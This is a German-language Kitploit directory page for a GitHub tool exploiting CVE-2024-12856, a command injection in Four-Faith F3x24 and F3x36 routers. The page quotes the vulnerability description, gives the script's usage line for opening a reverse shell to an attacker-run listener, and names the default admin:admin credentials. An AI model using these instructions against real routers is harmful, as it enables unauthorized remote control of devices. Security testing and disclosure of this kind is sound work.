Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-12856 — Ein Exploit für Four-Faith-Router, um eine Reverse Shell zu erhalten. | Kitploit
Tools/GitHubGitHub/nu113d/cve-2024-12856
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubnu113d/cve-2024-12856

CVE-2024-12856

Ein Exploit für Four-Faith-Router, um eine Reverse Shell zu erhalten.

Repository anzeigen
37vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-12856

Dies ist ein Exploit für die Four-Faith-Router-Modelle F3x24 und F3x36, um eine Reverse Shell zu erhalten.

„Die Four-Faith-Router-Modelle F3x24 und F3x36 sind von einer Schwachstelle zur Einschleusung von Betriebssystembefehlen (OS Command Injection) betroffen. Mindestens die Firmware-Version 2.0 ermöglicht es authentifizierten und entfernten Angreifern, beliebige Betriebssystembefehle über HTTP auszuführen, wenn die Systemzeit über apply.cgi geändert wird. Darüber hinaus verfügt diese Firmware-Version über Standard-Anmeldedaten, die, falls sie nicht geändert werden, diese Schwachstelle effektiv in ein Problem der nicht authentifizierten und entfernten Ausführung von Betriebssystembefehlen verwandeln würden.“

Quelle: nist.gov

Dieses Skript basiert auf einem Payload, der von VulnCheck beobachtet wurde.

Verwendung

Bevor Sie den Exploit ausführen, starten Sie einen TCP-Server auf Ihrem Rechner.
Führen Sie dann

python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT

aus.

Wobei

  • RHOST die entfernte IP-Adresse ist. Sie können auch eine Domain hinzufügen.
  • LHOST die IP Ihres TCP-Servers auf Ihrem Rechner ist.
  • LPORT der Port Ihres TCP-Servers ist.
  • USERNAME und PASSWORD die Anmeldedaten des Routers sind. Der Standardwert ist admin:admin.
  • RPORT der entfernte Port des Routers ist. Der Standardwert ist 80.
  • Haftungsausschluss

    Stellen Sie sicher, dass Sie diesen Exploit nur für Tests und in autorisierten Umgebungen verwenden.

    Verwenden Sie ihn niemals für böswillige Zwecke.

    Tool herunterladen